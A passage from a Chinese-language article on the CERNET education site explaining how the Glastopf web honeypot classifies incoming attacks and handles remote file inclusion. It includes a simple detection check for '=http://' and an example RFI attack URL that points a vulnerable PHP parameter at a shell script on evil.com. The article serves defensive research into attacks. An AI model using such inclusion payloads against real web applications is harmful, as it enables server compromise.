中国教育和科研计算机网
EDU首页 |  中国教育 |   高校科技 |   教育信息化 |   CERNET
教育信息化

资讯 | 专题 会议 观点 专栏 访谈 企业 产品 CIO 技术 校园信息化 下一代互联网 IPv6视频课堂

中国教育网 > 教育信息化
您现在的位置: EDU首页 > 教育信息化 > 网络安全 > 攻击防范 > 网络入侵
Glastopf:Web应用攻击诱捕软件及案例分析
http://www.edu.cn   2012-05-14 中国教育网络 作者:孙松柏 诸葛建伟 段海新

字体选择:【大】 【中】 【小】

  主要工作流程

图1 工作流程概要图

  在攻击者利用Google Hacking找到蜜罐并开始发动攻击之后,Glastopf蜜罐如何与攻击者进行交互并捕获攻击数据成为另一项重要的工作。这里我们以Glastopf中比较成熟的远程文件包含漏洞模块为例,介绍Glastopf蜜罐的整体工作流程:

  首先,所有攻击进入蜜罐后大致要经过以下几个过程:

  攻击者提交的HTTP请求方法是区分对待的,如果是POST方法,那么整个提交数据都被存储到蜜罐中。如果是HEAD 方法,Glastopf 蜜罐会给予一个简单服务器应答。Glastopf能够很好地处理GET方法,当处理GET方法时,蜜罐首先判断出攻击是属于哪种类型,因此,蜜罐内会对已知的攻击类型进行定义,然后对攻击进行判断,例如:上一节所举案例中提到的”color”是一个存有恶意URL的变量,这就是经常遇到的攻击类型——远程文件包含。然后蜜罐会触发对远程文件包含所特有的处理函数,代码如下:

  if '=http://' in request:
  handle_rfi_request()

  这样上面的远程文件包含漏洞就会被相应的函数做进一步处理:

  图2是Glastopf对目前攻击进行分类并处理工作过程。

图2 Glastopf对目前攻击进行分类并处理工作过程

  拿远程文件包含漏洞模拟(RFI)进行具体说明,对于一个典型的RFI攻击请求URL:

  http://example.com/hackme.php?color=http://evil.com/shell.php

页面功能 【打印】 【关闭】 【我有话说

MOOC风暴来袭

版权所有:中国教育和科研计算机网网络中心 CERNIC,CERNET,京ICP备15006448号-16,京网文[2017]10376-1180号

关于假冒中国教育网的声明 | 有任何问题与建议请联络:Webmaster@staff.cernet.com